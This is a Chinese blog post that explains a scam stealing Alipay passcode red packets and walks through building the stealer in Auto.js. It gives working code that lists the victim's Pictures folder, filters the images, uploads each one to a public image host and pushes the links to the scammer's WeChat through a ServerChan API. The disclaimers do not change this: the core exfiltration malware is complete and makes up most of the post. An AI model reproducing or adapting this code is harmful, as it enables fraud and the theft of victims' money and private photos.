盗刷支付宝口令新骗局(讲解与制作)

盗取支付宝口令红包,本文详细解释原理与制作过程

不要用于非法用途,微信推送接口,图床访问日志,支付宝收款等都可以找到你,网络不是法外之地

原理

骗子会让你发一个支付宝口令红包,说是来证明你有钱,等交易完成之后你再把口令给他,等你发了红包,这时候看似正常而又良心的商家会给你发一个软件,软件可能是某某游戏外挂,suo机生成器,甚至是色情软件,等你打开软件的那一刻,骗子也会收到一条名为“鱼咬勾了”的信息,你的口令就在那里面。

大佬看到这里就可以退出了,全文没有什么技术难点

思路

思路很简单,接下来一步一步实现

开始制作

语言选用autojs,用这个写简单

遍历指定目录

支付宝发送口令红包的时候会自动生成图片并保存到/storage/emulated/0/Pictures中,但是为了代码以后升级与扩展,我还是决定把路径以参数的形式传进去

代码实现:

function getFilesFromPath(path) {
    /*格式:getFilesFromPath(文件夹路径)*/
    /*解释:获取文件夹所有文件和文件夹 递归遍历 返回文件路径数组*/
    var arrDir = new Array();
    var arrFile = new Array();
    try {
        var rp = /^([/][^\/:*?<>|]+[/]?)+$/;
        if (rp.test(path) == false) throw "非法文件路径,H.getFilesFromPath(?);" + path;
    } catch (err) {
        log(err);
        exit();
    }
    /*获取path目录下所有文件夹和文件*/
    var arr = files.listDir(path);
    /*遍历文件和文件夹*/
    for (var i = 0; i < arr.length; i++) {
        /*连接路径*/
        newPath = files.join(path, arr[i]);
        /*判断路径类型*/
        if (files.isDir(newPath)) {
            //arrDir.push(newPath);
            /*递归遍历文件夹*/
            //var arrF = getFilesFromPath(newPath);
            //arrDir = arrDir.concat(arrF);
            //注释这几行是递归遍历所有文件的,这里不需要,所以注释
        } else if (files.isFile(newPath)) {
            arrFile.push(newPath);
        }
    }
    /*按字母升序排序数组*/
    arrDir.sort();
    arrFile.sort();
    /*连接数组并返回*/
    return arrDir.concat(arrFile);
}

正则筛选图片

这个其实是可以写入到上一个函数里面的,但是,一个函数一个功能,不能混,不然过几天我就看不懂自己的代码了

代码实现:

function imgPatt(arrdizhi){
    var imgarr=[]
    for(j=0;j<arrdizhi.length;j++){//遍历所有的文件
        if(arrdizhi[j].search(/^.*?[.](bmp|jpg|gif|jpeg)/i)==false){//判断是否是图片,如果是就写入到数组中
            imgarr[imgarr.length]=arrdizhi[j];
        }
    }
    return imgarr;
}

上传图床

这一步其实是可以上传到自己服务器的,但是考虑到安全性,还是上传到图床比较稳

代码实现(上传):

function upImg(path) {
    var url = "http://pic.sogou.com/pic/upload_pic.jsp";
    var res = http.postMultipart(url, {
        "file": open(path),
    });
    return res.body.string();
}

由于上传的不是一张图片,所以还得写个循环:

function arrUp(arrimg){
    var arrurl_f=[]
    for(i=0;i<arrimg.length;i++){
        arrurl_f[arrurl_f.length]=upImg(arrimg[i])
    }
    return arrurl_f;
}

推送到微信

这里用的是Server酱的接口,用别的接口自己写吧(注意,我这里是把结果弄成md的形式上传的,这样微信收到的就可以直接看到,不需要再转到浏览器了)

代码实现:

function weChat(arrstr){
    var md;
    for(i=0;i<arrstr.length;i++){
        md+="![]("+arrstr[i]+")\n";
    }
    var api="https://sc.ftqq.com/xxxxxxxxxxxxxxxxxxxxxxxx.send?text=鱼咬勾了&desp=";
    var json_api = http.get(api+md).body.json();
    return json_api;
}

至此,核心代码就已经写完了,往下我也不写了,再写就是帮助你犯罪了

posted @ 2021-02-07 16:59  陈文生  阅读(1703)  评论(0编辑  收藏